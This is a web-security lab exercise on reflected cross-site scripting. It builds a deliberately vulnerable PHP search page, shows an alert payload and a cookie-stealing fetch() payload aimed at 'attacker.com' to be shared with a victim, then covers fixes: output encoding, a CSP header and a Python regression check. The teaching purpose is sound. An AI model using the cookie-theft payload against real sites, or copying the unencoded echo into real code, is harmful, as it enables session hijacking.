Exercise 45: Cross-Site Scripting (XSS) – Reflected XSS

May 28, 2025

Objective

Learn how to exploit Reflected Cross-Site Scripting (XSS) vulnerabilities by injecting malicious scripts through URL parameters or user inputs that are immediately reflected in the page response. Understand how to mitigate this vulnerability through input validation, output encoding, and secure coding practices.


Scenario

You are testing a web application with a search feature that directly reflects user input in the page without proper sanitization. This allows an attacker to craft malicious URLs that, when visited by a victim, execute unauthorized scripts in their browser.


Lab Setup

Prerequisites:

  • Basic knowledge of PHP and JavaScript.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

  1. PHP Script for the Search Feature (Vulnerable)
    • Create a file search.php with the following contents. The q parameter is echoed into the page unchanged, which is the flaw this exercise targets:

        <?php
        // Vulnerable on purpose: $search is inserted into the HTML without any encoding.
        if (isset($_GET['q'])) {
            $search = $_GET['q'];
            echo "<h2>Search Results for: $search</h2>";
        } else {
            echo "<h2>Enter a search term.</h2>";
        }
        ?>
        <h2>Search</h2>
        <form method="GET" action="">
            <input type="text" name="q" required>
            <button type="submit">Search</button>
        </form>
  2. Running the Application
    • Start the Apache server.
    • Place search.php in the web server’s root directory (htdocs for XAMPP).
    • Open http://localhost/search.php in your browser.

Exploitation Steps

Step 1: Injecting Malicious Script via URL

  1. Craft a malicious URL with the following payload: http://localhost/search.php?q=<script>alert('XSS')</script>
  2. Visit the URL in the browser.

Expected Result:

  • The injected script executes, displaying an alert box with the message “XSS”.

Step 2: Creating a Phishing Link

  1. Modify the payload to steal cookies: http://localhost/search.php?q=<script>fetch('http://attacker.com/steal.php?cookie=' + document.cookie)</script>
  2. Share the link with a victim.

Expected Result:

  • The victim’s cookies are sent to the attacker’s server upon clicking the link.

Solution and Prevention

Problem Analysis

  • User input is reflected in the web page without any sanitization or encoding, allowing arbitrary JavaScript execution.

Fixing the Vulnerability

  1. Input Validation
    • Validate input to allow only safe characters:

        // FILTER_SANITIZE_STRING strips tags and encodes quotes; it is deprecated
        // since PHP 8.1, so rely on the output encoding in step 2 as the primary defence.
        $search = filter_var($_GET['q'], FILTER_SANITIZE_STRING);
        echo "<h2>Search Results for: $search</h2>";
  2. Output Encoding
    • Encode output so the browser renders the input as text rather than markup:

        echo "<h2>Search Results for: " . htmlspecialchars($search, ENT_QUOTES, 'UTF-8') . "</h2>";
  3. Implement Content Security Policy (CSP)
    • Restrict script execution with CSP headers:

        // header() must be called before any output is sent, so place this at the top of search.php.
        header("Content-Security-Policy: default-src 'self'; script-src 'self'");
  4. Use Secure JavaScript Libraries
    • Avoid using eval() or dynamic script injections.

Testing After Fix

  1. Attempt to access http://localhost/search.php?q=<script>alert('XSS')</script>.
  2. Expected Result:
    • The input is displayed as text, and the script does not execute.
  3. Try advanced payloads.
  4. Expected Result:
    • All malicious inputs are neutralized or blocked.
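The fix and the post-fix test above can be exercised offline. The following Python model, added here and not part of the original exercise, mirrors the lab's search.php in both its vulnerable and hardened forms: html.escape(quote=True) plays the role of htmlspecialchars with ENT_QUOTES, the CSP header is attached to the response, and a regression check confirms the page's payloads are no longer reflected as markup while ordinary input survives encoding unchanged. The payloads are the two from this exercise; the benign term and the helper names are constructed for the example.

```python
import html
from typing import Dict, Tuple

# Constructed inputs: the two payloads used in the exercise, plus a benign
# term containing characters that encoding must preserve rather than strip.
SCRIPT_PAYLOAD = "<script>alert('XSS')</script>"
COOKIE_PAYLOAD = ("<script>fetch('http://attacker.com/steal.php?cookie=' "
                  "+ document.cookie)</script>")
BENIGN_TERM = "Tom & Jerry's \"cat\" <3"

CSP = "default-src 'self'; script-src 'self'"
FORM = ('<h2>Search</h2><form method="GET" action="">'
        '<input type="text" name="q" required>'
        '<button type="submit">Search</button></form>')


def render_vulnerable(q: str) -> Tuple[Dict[str, str], str]:
    """Mirror of the lab's search.php: q is interpolated into the HTML as-is."""
    return {}, f"<h2>Search Results for: {q}</h2>{FORM}"


def render_hardened(q: str) -> Tuple[Dict[str, str], str]:
    """Output-encoded version plus the CSP header from the fix.

    html.escape(quote=True) encodes & < > " and ', the same set that
    htmlspecialchars($s, ENT_QUOTES, 'UTF-8') handles in PHP. The header is
    prepared before the body, mirroring PHP's rule that header() must run
    before any output is sent."""
    headers = {"Content-Security-Policy": CSP}
    body = f"<h2>Search Results for: {html.escape(q, quote=True)}</h2>{FORM}"
    return headers, body


def reflects_raw_markup(body: str, q: str) -> bool:
    """Regression check for 'Testing After Fix': True when the raw input,
    angle brackets included, appears verbatim in the response body."""
    return q in body


def reflected_text(body: str) -> str:
    """Pull the reflected search term back out and decode it, to show that
    encoding is lossless: the user still sees exactly what they typed."""
    marker = "Search Results for: "
    start = body.index(marker) + len(marker)
    end = body.index("</h2>", start)
    return html.unescape(body[start:end])
```

Each payload is neutralised by encoding alone; the CSP header is defence in depth that also blocks any inline script the encoding step might miss elsewhere in the page.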

Conclusion

In this lab, you exploited a Reflected XSS vulnerability by injecting malicious scripts through URL parameters. You also learned how to prevent this vulnerability through input validation, output encoding, and implementing Content Security Policies (CSP).
